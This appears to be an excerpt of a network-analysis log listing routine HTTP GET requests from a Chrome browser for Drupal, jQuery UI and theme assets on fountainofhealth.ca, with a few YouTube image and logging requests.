Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/hidden.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/underscore/underscore-min.js?v=1.13.6 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-active-element-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /core/modules/views/css/views.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/css/wave.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery/jquery.min.js?v=3.7.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/keycode-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/controlgroup-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/drupal.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/draggable-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/checkboxradio-min.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-blur-min.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/dialog-min.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/ajax.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/message.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1
    host: fountainofhealth.ca
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: */*
    sec-fetch-site: none
    sec-fetch-mode: cors
    sec-fetch-dest: empty
    sec-fetch-storage-access: active
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0
    cookie: _ga=GA1.1.1027095347.1748893175
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/progress.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/debounce.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/drupal.bootstrap.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/progress.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/script.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/announce.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/misc/states.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/js/thrivequestion.js?swwsy8 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /modules/google_analytics/js/google_analytics.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1
    host: www.youtube.com
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    accept: */*
    x-client-data: CLbgygE=
    sec-fetch-site: none
    sec-fetch-mode: cors
    sec-fetch-dest: empty
    sec-fetch-storage-access: active
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /modules/webform/js/webform.behaviors.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://fountainofhealth.ca/en
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/resizable-min.js?v=10.1.0 HTTP/1.1
    host: fountainofhealth.ca
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
